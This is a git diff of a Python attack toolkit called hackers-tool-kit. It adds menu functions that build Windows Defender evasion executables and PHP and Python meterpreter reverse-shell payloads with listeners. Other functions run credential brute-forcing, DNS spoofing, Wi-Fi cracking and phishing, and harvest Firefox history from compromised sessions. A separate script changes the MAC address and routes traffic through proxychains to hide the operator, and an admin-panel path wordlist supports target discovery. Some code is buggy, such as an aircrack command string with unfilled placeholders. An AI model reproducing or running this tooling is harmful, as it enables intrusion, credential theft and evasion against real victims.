resa(): j = raw_input("USERNAME: ") k = raw_input("NEW PASSWORD: ") @@ -1146,6 +2189,12 @@ def resa(): if q == "y": a = 'echo "{0}:{1}" | chpasswd'.format(j,k) print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# def resu(): j = raw_input("PASSWORD: ") print "are you sure?" @@ -1156,6 +2205,12 @@ def resu(): if q == "y": a = 'passwd {0}'.format(j) print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# def hashid(): #!/usr/bin/python # encoding: utf-8 @@ -1734,9 +2789,21 @@ def WhirlpoolHMAC(): print "Possible Hashs:" for a in range(len(jerar)): print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# def restart(): os.system("clear") os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# def medusa(): k = raw_input("Target Host: ") u = raw_input("User: ") @@ -1747,10 +2814,22 @@ def medusa(): n = raw_input("Port: ") a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# def wafwoof(): j = raw_input("Enter Target: ") k = 'wafw00f {0}'.format(j) os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# def cloud(): subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] @@ -1767,189 +2846,657 @@ def cloud(): pass print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# def brutex(): k = raw_input("Target: ") p = raw_input("Port: ") a = 'brutex {0} {1}'.format(k,p) os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# def methelp(): os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# def winbyp(): os.system("cat /root/hackers-tool-kit/tools/payloads.txt") pay = raw_input("Payload: ") port = raw_input("Port: ") name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') - os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') - os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) - os.system('echo "run\n" >> handler.rc') + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# def exploit(): os.system("cat /root/hackers-tool-kit/tools/exploits.txt") print "\n" f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> handler.rc'.format(f)) - os.system('echo "show options\n" >> handler.rc'.format(f)) + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# def phish(): os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# def datalist(): - os.system('echo "hosts\n" >> handler.rc') - os.system('echo "services\n" >> handler.rc') + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#DNS SPOOF START# +#---------------# +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + + +#-------------# +#DNS SPOOF END# + + +#REBOOT HTK START# +#----------# +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() +#--------------# +#REBOOT HTK END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# def main(): found = False while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : + try: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoofall": + dnsspoofall() + if x == "htk-lite": + os.system("python /root/hackers-tool-kit/htk-lite/htkl.py") + if x == "reboot": + reboot() + if x == "specscan": + specscan() + if x == "anon on": + anonon() + if x == "anon off": + anonoff() + + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") found = True + mainbanner() main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# diff --git a/htksecure.py b/htksecure.py new file mode 100644 index 0000000..b54e690 --- /dev/null +++ b/htksecure.py @@ -0,0 +1,39 @@ +import os +import sys +print "--------------------------------------------------------------------------------------------------" +print """\033[93m!WELCOME TO THE SECURE VERSION OF HACKERS-TOOL-IT WHAT THIS MEANS IS THAT +THE HACKERS-TOOL-KIT WILL BE RUN WITH PROXYCHAINS AND OTHER TOOLS MAKING YOU NEAR ANONYMOUS EXITING +THE TERMINAL SHOULD STOP THE PROXYCHAINS NOTE SOME STUFF MIGHT NOT WORK OR MIGHT BE SLOW DUE TO THE +PROXYCHAINS YOU HAVE TO HAVE YOUR PROXYCHAINS CONFIG FILE ALREADY SETUP TO USE THIS!\033[0m""" +print "--------------------------------------------------------------------------------------------------" +print "\n" +print "\033[92mWould you like to continue? y or n\033[0m" +h = raw_input("?: ") +if h == "n": + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() +if h == "y": + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + print "\nSTARTING HTK WITH PROXYCHAINS\n" + os.system("proxychains python /root/hackers-tool-kit/htk.py") + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) diff --git a/htkupdate.py b/htkupdate.py new file mode 100644 index 0000000..ff5606d --- /dev/null +++ b/htkupdate.py @@ -0,0 +1,4 @@ +import os +print "UPDATING..." +os.system("cd") +os.system('cd /root/ && rm -fr hackers-tool-kit && git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit && echo "[UPDATED]: Restart Your Terminal"') \ No newline at end of file diff --git a/install.py b/install.py index 61eb850..07593da 100644 --- a/install.py +++ b/install.py @@ -1,32 +1,52 @@ -import sys import os - def install(): - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") + os.system("apt update") + os.system("apt install python-tk") + os.system("apt install dirb -y") + os.system("apt install sslstrip -y") + os.system("apt install bettercap -y") + os.system("apt install sslscan -y") + os.system("apt install crunch -y") + os.system("apt install tcpdump -y") + os.system("apt install macchanger -y") + os.system("apt install wafw00f -y") + os.system("apt install medusa -y") os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") os.system("cd /root && git clone https://github.com/1N3/BruteX") os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("pip install colorama") - os.system("pip install dnspython") - os.system("pip install shodan") + os.system("pip22 install mechanize") + os.system("pip2 install json") + os.system("pip2 install whois") + os.system("pip2 install python-whois") + os.system("pip2 install requests") + os.system("pip2 install bs4") + os.system("pip2 install tkinter") + os.system("pip2 install requests[socks]") + os.system("pip2 install urlparse") + os.system("pip2 install cookielib") + os.system("pip2 install scapy") + os.system("pip2 install datetime") + os.system("pip2 install argparse") + os.system("pip2 install re") + os.system("pip2 install threading") + os.system("pip2 install urllib2") + os.system("pip2 install modules") + os.system("pip2 install builtwith") + os.system("pip2 install smtplib") + os.system("pip2 install whois") + os.system("pip2 install builtwith") + os.system("pip2 install colorama") + os.system("pip2 install dnspython") + os.system("pip2 install shodan") os.system("apt install python-socks -y") os.system("apt install nmap -y") os.system("apt install php -y") os.system("apt install perl -y") os.system("apt install hashcat -y") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") + os.system("apt install nc -y") + os.system("apt install neofetch -y") + os.system("apt install cupp -y") + os.system("gem install lolcat") os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") os.system("cd /root/kali-anonsurf && ./installer.sh") print "\n" @@ -38,62 +58,6 @@ def install(): os.system("apt install wifite -y") os.system("apt install reaver -y") os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("cd /root/social-engineer-toolkit && pip2 install -r requirements.txt") os.system("python /root/social-engineer-toolkit/setup.py install") - - - -print "are you running on the real kali linux os [y/n]" -check = raw_input("[y/n]> ") -if check == "y" : - print "ok most tools should work for you you might have to install other" - print "things on your os for this to work if it doesnt work" - os.system("sleep 2") - install() - -if check == "n" : - print "then some of the tools in this script might not work" - print "do you want to continue installation [y/n]" - install = raw_input("[y/n]> ") - if install == "y" : - def install(): - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - install() - if install == "n" : - print "thanks for checking out my script" - sys.exit() +install() diff --git a/redhawk/config.php b/redhawk/config.php new file mode 100644 index 0000000..2a01c60 --- /dev/null +++ b/redhawk/config.php @@ -0,0 +1,15 @@ + diff --git a/redhawk/crawl/admin.ini b/redhawk/crawl/admin.ini new file mode 100644 index 0000000..e31ea2e --- /dev/null +++ b/redhawk/crawl/admin.ini @@ -0,0 +1 @@ +admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,admin/account.php,admin/index.php,admin/login.php,admin/admin.php,admin/account.php,admin_area/admin.php,admin_area/login.php,siteadmin/login.php,siteadmin/index.php,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/index.php,bb-admin/index.php,bb-admin/login.php,bb-admin/admin.php,admin/home.php,admin_area/login.html,admin_area/index.html,admin/controlpanel.php,admin.php,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin/cp.php,cp.php,administrator/index.php,administrator/login.php,nsw/admin/login.php,webadmin/login.php,admin/admin_login.php,admin_login.php,administrator/account.php,administrator.php,admin_area/admin.html,pages/admin/admin-login.php,admin/admin-login.php,admin-login.php,bb-admin/index.html,bb-admin/login.html,acceso.php,bb-admin/admin.html,admin/home.html,login.php,modelsearch/login.php,moderator.php,moderator/login.php,moderator/admin.php,account.php,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,controlpanel.php,admincontrol.php,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,rcjakar/admin/login.php,adminarea/index.html,adminarea/admin.html,webadmin.php,webadmin/index.php,webadmin/admin.php,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,adminpanel.php,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,user.php,account.html,controlpanel.html,admincontrol.html,panel-administracion/login.php,wp-login.php,adminLogin.php,admin/adminLogin.php,home.php,admin.php,adminarea/index.php,adminarea/admin.php,adminarea/login.php,panel-administracion/